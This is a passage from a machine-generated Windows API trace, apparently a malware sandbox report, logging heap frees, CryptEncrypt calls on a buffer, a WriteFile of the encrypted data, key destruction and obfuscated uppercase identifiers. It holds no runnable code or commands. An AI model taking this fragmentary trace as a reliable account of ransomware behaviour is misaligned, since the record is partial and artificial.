| out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0152.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0152.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d7648 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0152.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0152.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa450, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.051] CryptEncrypt (in: hKey=0x9e1ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x175f2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x175f8) returned 1 [0152.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.051] CharLowerBuffW (in: lpsz="byte[95736]", cchLength=0xb | out: lpsz="byte[95736]") returned 0xb [0152.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.056] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.056] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.058] CryptEncrypt (in: hKey=0x9e1ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d7648*, pdwDataLen=0x8cef60*=0x175f2, dwBufLen=0x175f8 | out: pbData=0x37d7648*, pdwDataLen=0x8cef60*=0x175f8) returned 1 [0152.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.066] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.066] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.066] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.066] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.066] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.066] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.066] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.066] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.067] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.067] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.067] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.067] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.067] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.067] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.067] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.067] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.067] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.067] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.067] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.076] WriteFile (in: hFile=0x4f8, lpBuffer=0x2ac6a10*, nNumberOfBytesToWrite=0x175f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac6a10*, lpNumberOfBytesWritten=0x8cf5e4*=0x175f8, lpOverlapped=0x0) returned 1 [0152.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.136] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0152.136] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.136] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0152.136] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.136] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.136] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.136] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.136] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.136] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.136] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0152.137] CryptDestroyKey (hKey=0x9e1ef8) returned 1 [0152.137] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.137] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.137] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.137] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.137] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.137] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.137] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.137] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.137] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.137] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.137] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.137] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.138] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.138] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.138] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.138] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.138] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.138] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.138] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.138] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.138] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.138] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.138] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.138] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.138] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.139] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.139] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.139] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.139] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.139] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.139] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.139] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0152.142] CryptReleaseContext (hProv=0x9bf000, dwFlags=0x0) returned 1 [0152.142] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.142] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.142] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.142] FreeLibrary (hLibModule=0x76390000) returned 1 [0152.142] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.142] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 